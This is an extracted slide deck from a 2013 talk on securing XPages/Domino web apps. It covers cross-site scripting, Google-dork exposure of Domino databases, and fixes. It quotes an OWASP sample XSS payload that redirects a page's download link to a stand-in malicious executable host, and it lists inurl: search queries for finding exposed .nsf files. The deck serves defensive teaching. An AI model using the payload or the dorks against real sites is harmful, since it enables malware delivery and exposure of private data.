Can your Xpage App Stand Up to Criminals? Bernie Leung MESA Technology Bernie Leung MESA Technology
May 30, 2015
Can your Xpage App Stand Up to Criminals?
Bernie Leung
MESA TechnologyBernie Leung
MESA Technology
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Not another Domino Security Talk, Right?
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Not another Domino Security Talk, Right?
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
How to Secure Domino Server
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Then what are these doing here?
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Controlled Environment ? …. No More
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Vulnerability
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Topics:
1. XSS2. Security by Obscurity3. What can we do about it?
And DEMOS's - open your laptop and follow
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Anatomy of Xpages Web App
<xp: ..... >
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Anatomy of XPages
<xp: ..... >
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Cross Site Scripting
Why is it Bad?
demo.
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
XSS – non persistent
For example, consider a site that has a welcome notice " Welcome %username% " and a download link
Instead you enterhttp://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>
*Sample copied from OWASP
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
XSS – persistent
User form input, stored and later retrieved by others
*Sample copied from OWASP
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
In jsp,
Include JSTL (java standard tag lib)And output via c:out value="${outputWords}”
In Domino,
Add to NOTES.ini DominoValidateFramesetSRC=1
Fixing the Vulnerability
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
How Many other Libraries Do You Use?
Are you bringing in vulnerabilities?
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Security by Obscurity
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Another Common Vulnerability
Sensitive nsf open to public
Google is our frien-emy
inurl:/ibmsxpresinurl:/names.nsfinurl:/todo.nsf
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
DEMO
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Keeping Up with the Bad Guys
IBM AppScan
Open Source
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
DEMO
How I Found the VulnerabilitiesUsing IBM AppScan
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Thank You and Be Safe.
Contact Bernie Leung [email protected]